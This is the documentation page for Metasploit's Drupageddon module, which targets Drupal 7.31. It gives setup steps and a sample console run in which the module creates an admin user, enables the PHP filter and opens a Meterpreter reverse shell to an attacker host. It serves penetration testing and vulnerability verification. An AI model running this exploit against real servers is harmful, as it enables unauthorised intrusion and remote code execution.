GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/multi/http/drupal_drupageddon.md

Vulnerable Application

Drupal 7.31 official download

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use exploit/multi/http/drupal_drupageddon

  4. Do: set rhost <ip>

  5. Do: run

  6. You should get a shell.

Scenarios

This is a run against a Drupal 7.31 Linux box.

    msf > use exploit/multi/http/drupal_drupageddon
    msf exploit(drupal_drupageddon)
    msf exploit(drupal_drupageddon) > set rhost 1.1.1.1
    rhost => 1.1.1.1
    msf exploit(drupal_drupageddon) > set verbose true
    verbose => true
    msf exploit(drupal_drupageddon) > exploit
    [*] Started reverse TCP handler on 2.2.2.2:4444
    [*] Testing page
    [*] form_build_id: form-a1VaaaEaa0lUvL79wIAfdQEaaJRw8P7a1aWGXElI_Go
    [*] form_token:
    [*] password hash: $P\$8zAAApjTciVA2qz7HdAA0UjAAwUft00
    [*] Creating new user AaCaUlLaPR:AAgeAAAAjA
    [*] Logging in as AaCaUlLaPR:AAgeAAAAjA
    [*] cookie: SESS911797186fac11111d08b1111a15db55=aaSfinhC0AAAAbzhAoO3bBaaOerRrvpn3cL0rA77Dhg;
    [*] Trying to parse enabled modules
    [*] form_build_id: form-YZljDkG8n5AAaAaAaaaYGLaP8MIfdif5VfwjQMMxdN0
    [*] form_token: Bj92oAaAaWRwqyAAAySWQpeUI03aA9wfkAozXsk_t_E
    [*] Enabling the PHP filter module
    [*] Setting permissions for PHP filter module
    [*] form_build_id: form-1Z1pAg11amM-1jHALgm1AAAAA1JdwAAA1qXnSTZahPA
    [*] form_token: kAA1A1AfqK_PvJQi1AAAAAAAAxyGyLvHemBor1q11Z1
    [*] admin role id: 3
    [*] Getting tokens from create new article page
    [*] form_build_id: form-_-leQaaaAAeBXbAaAAaaAAx1IrYSI1qeA2OGf2Ce1vs
    [*] form_token: Ib1y8aAaaAAAdapA53kUcfWf7msTRHiDUb_CIKzAAAA
    [*] Calling preview page. Exploit should trigger...
    [*] Sending stage (33721 bytes) to 1.1.1.1
    [*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:45388) at 2016-08-25 11:30:41 -0400
    meterpreter > sysinfo
    Computer : drupal
    OS : Linux drupal 2.6.32-642.3.1.el6.x86_64 #1 SMP Sun Jun 26 18:16:44 EDT 2016 x86_64
    Meterpreter : php/linux
    meterpreter > getuid
    Server username: apache (48)